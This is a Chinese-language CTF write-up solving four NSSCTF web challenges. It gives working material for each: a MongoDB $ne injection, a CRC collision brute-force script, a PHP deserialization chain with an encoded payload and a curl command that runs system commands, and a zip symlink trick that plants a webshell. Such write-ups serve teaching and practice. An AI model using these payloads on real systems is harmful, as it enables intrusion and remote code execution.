NSSCTF 4th WEB AK

ez_signin

查看源码，使用的的mongodb，可以使用{"$ne": null}列出所有的值

向/search发送post {"title": {"$ne": null}} 得到所有书籍，flag就在其中

flag: NSSCTF{b3a93cbc-8a05-4a10-b332-fabf9c91bcca}

EzCRC

让AI生成的暴力破解密钥脚本

import random
import string


def compute_crc16(data: bytes) -> int:
    """
    在 Python 中复现 PHP 的 CRC-16/MODBUS 算法。
    """
    checksum = 0xFFFF
    for byte in data:
        checksum ^= byte
        for _ in range(8):
            if checksum & 1:
                checksum = (checksum >> 1) ^ 0xA001
            else:
                checksum >>= 1
    return checksum


def calculate_crc8(data: bytes) -> int:
    """
    在 Python 中复现 PHP 的查表法 CRC8 算法。
    """
    crc8_table = [
        0x00, 0x07, 0x0E, 0x09, 0x1C, 0x1B, 0x12, 0x15, 0x38, 0x3F, 0x36, 0x31,
        0x24, 0x23, 0x2A, 0x2D, 0x70, 0x77, 0x7E, 0x79, 0x6C, 0x6B, 0x62, 0x65,
        0x48, 0x4F, 0x46, 0x41, 0x54, 0x53, 0x5A, 0x5D, 0xE0, 0xE7, 0xEE, 0xE9,
        0xFC, 0xFB, 0xF2, 0xF5, 0xD8, 0xDF, 0xD6, 0xD1, 0xC4, 0xC3, 0xCA, 0xCD,
        0x90, 0x97, 0x9E, 0x99, 0x8C, 0x8B, 0x82, 0x85, 0xA8, 0xAF, 0xA6, 0xA1,
        0xB4, 0xB3, 0xBA, 0xBD, 0xC7, 0xC0, 0xC9, 0xCE, 0xDB, 0xDC, 0xD5, 0xD2,
        0xFF, 0xF8, 0xF1, 0xF6, 0xE3, 0xE4, 0xED, 0xEA, 0xB7, 0xB0, 0xB9, 0xBE,
        0xAB, 0xAC, 0xA5, 0xA2, 0x8F, 0x88, 0x81, 0x86, 0x93, 0x94, 0x9D, 0x9A,
        0x27, 0x20, 0x29, 0x2E, 0x3B, 0x3C, 0x35, 0x32, 0x1F, 0x18, 0x11, 0x16,
        0x03, 0x04, 0x0D, 0x0A, 0x57, 0x50, 0x59, 0x5E, 0x4B, 0x4C, 0x45, 0x42,
        0x6F, 0x68, 0x61, 0x66, 0x73, 0x74, 0x7D, 0x7A, 0x89, 0x8E, 0x87, 0x80,
        0x95, 0x92, 0x9B, 0x9C, 0xB1, 0xB6, 0xBF, 0xB8, 0xAD, 0xAA, 0xA3, 0xA4,
        0xF9, 0xFE, 0xF7, 0xF0, 0xE5, 0xE2, 0xEB, 0xEC, 0xC1, 0xC6, 0xCF, 0xC8,
        0xDD, 0xDA, 0xD3, 0xD4, 0x69, 0x6E, 0x67, 0x60, 0x75, 0x72, 0x7B, 0x7C,
        0x51, 0x56, 0x5F, 0x58, 0x4D, 0x4A, 0x43, 0x44, 0x19, 0x1E, 0x17, 0x10,
        0x05, 0x02, 0x0B, 0x0C, 0x21, 0x26, 0x2F, 0x28, 0x3D, 0x3A, 0x33, 0x34,
        0x4E, 0x49, 0x40, 0x47, 0x52, 0x55, 0x5C, 0x5B, 0x76, 0x71, 0x78, 0x7F,
        0x6A, 0x6D, 0x64, 0x63, 0x3E, 0x39, 0x30, 0x37, 0x22, 0x25, 0x2C, 0x2B,
        0x06, 0x01, 0x08, 0x0F, 0x1A, 0x1D, 0x14, 0x13, 0xAE, 0xA9, 0xA0, 0xA7,
        0xB2, 0xB5, 0xBC, 0xBB, 0x96, 0x91, 0x98, 0x9F, 0x8A, 0x8D, 0x84, 0x83,
        0xDE, 0xD9, 0xD0, 0xD7, 0xC2, 0xC5, 0xCC, 0xCB, 0xE6, 0xE1, 0xE8, 0xEF,
        0xFA, 0xFD, 0xF4, 0xF3
    ]
    crc = 0
    for byte in data:
        crc = crc8_table[(crc ^ byte) & 0xff]
    return crc & 0xff


def find_collision():
    """
    寻找符合条件的密码碰撞。
    """
    secret_pass = "Enj0yNSSCTF4th!"
    secret_pass_bytes = secret_pass.encode('utf-8')
    pass_len = len(secret_pass_bytes)

    # 1. 计算目标 CRC 值
    target_crc16 = compute_crc16(secret_pass_bytes)
    target_crc8 = calculate_crc8(secret_pass_bytes)

    print(f"原始密码: {secret_pass}")
    print(f"目标 CRC16: {hex(target_crc16)}")
    print(f"目标 CRC8: {hex(target_crc8)}")
    print("-" * 30)
    print("正在尝试寻找碰撞...")

    # 2. 定义用于生成随机字符串的字符集
    # 包含字母、数字和一些常见符号，与原始密码中的字符类似
    charset = string.ascii_letters + string.digits + string.punctuation

    attempts = 0
    while True:
        attempts += 1
        # 3. 生成一个与原始密码长度相同的随机字符串
        user_input = ''.join(random.choice(charset) for _ in range(pass_len))
        user_input_bytes = user_input.encode('utf-8')

        # 确保生成的新密码与原始密码不同
        if user_input == secret_pass:
            continue

        # 4. 计算新密码的 CRC 值
        user_crc16 = compute_crc16(user_input_bytes)
        user_crc8 = calculate_crc8(user_input_bytes)

        # 5. 检查 CRC 值是否同时匹配
        if user_crc16 == target_crc16 and user_crc8 == target_crc8:
            print(f"\n成功找到碰撞!")
            print(f"尝试次数: {attempts}")
            print(f"找到的密码: {user_input}")
            print(f"它的 CRC16: {hex(user_crc16)}")
            print(f"它的 CRC8: {hex(user_crc8)}")
            break

        if attempts % 1000000 == 0:
            print(f"已尝试 {attempts} 次，当前尝试: {user_input}")


if __name__ == "__main__":
    find_collision()

尝试12213310次后碰撞出密钥UP,bq[uBm1Nk}zj

传入得到flag: NSSCTF{6cbee1ae-fc50-489a-b06f-3862ca6a7e5f}

[mpga]filesystem

下载网页源码，发现在file_to_check处有个反序列化

<?php
class FunctionInvoker {
    public $functionName;
    public $functionArguments;
}

class ContentProcessor {
    private $processedContent;
    public $callbackFunction;

    public function __construct() {
        $this->processedContent = new FunctionInvoker();
    }
}

class FileManager {
    public $targetFile;
    public $responseData = 'default_response';
}

// 创建对象链
$cp = new ContentProcessor();
$cp->callbackFunction = "system"; // 设置回调函数为system

$fm2 = new FileManager();
$fm2->targetFile = $cp; // 将targetFile设置为ContentProcessor对象

$fm1 = new FileManager();
$fm1->targetFile = $fm2; // 将targetFile设置为另一个FileManager对象

// 序列化对象
$serialized = serialize($fm1);
$encode = urlencode($serialized);
echo "URL encoded payload: " . $encode . "\n";
?>

生成payload：O%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A16%3A%22ContentProcessor%22%3A2%3A%7Bs%3A34%3A%22%00ContentProcessor%00processedContent%22%3BO%3A15%3A%22FunctionInvoker%22%3A2%3A%7Bs%3A12%3A%22functionName%22%3BN%3Bs%3A17%3A%22functionArguments%22%3BN%3B%7Ds%3A16%3A%22callbackFunction%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7D

curl -X POST 'http://node8.anna.nssctf.cn:24975/?action=home' \
--data-urlencode 'submit_md5=1' \
--data-urlencode 'method=performWriteOperation' \
--data-urlencode 'var=processedContent' \
--data-urlencode 'cmd=cat /flag' \
-d 'file_to_check=O%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A11%3A%22FileManager%22%3A2%3A%7Bs%3A10%3A%22targetFile%22%3BO%3A16%3A%22ContentProcessor%22%3A2%3A%7Bs%3A34%3A%22%00ContentProcessor%00processedContent%22%3BO%3A15%3A%22FunctionInvoker%22%3A2%3A%7Bs%3A12%3A%22functionName%22%3BN%3Bs%3A17%3A%22functionArguments%22%3BN%3B%7Ds%3A16%3A%22callbackFunction%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7Ds%3A12%3A%22responseData%22%3Bs%3A16%3A%22default_response%22%3B%7D'

执行得到flag: NSSCTF{eb6cb5b6-65ae-4187-ac1f-c4e872ae494f}

ez_upload

看到提示php -s 是启动php内置的web服务器，而这个服务器有个漏洞，能将php文件作为静态文件直接输出源码

GET /index.php HTTP/1.1
Host: node8.anna.nssctf.cn:26752


GET /xxxx.xx HTTP/1.1

读取index.php源码，得到

<?php
error_reporting(0);

$finfo = finfo_open(FILEINFO_MIME_TYPE);
if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){
    exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]);
};
?>

经典unzip的软连接穿梭目录

ln -s /var/www/html test
zip --symlinks test1.zip test
#构造出指向/var/www/html的test目录
#将一句话木马放入test目录下
zip -r test2.zip test
#将生成的两个压缩包依次上传，test2.zip内容会被解压至test所指向目录，也就是/var/www/html

木马上传成功，执行cat /flag得到flag

flag: NSSCTF{y0u_ar3_50ft_l1nk_m4st3r!!!!}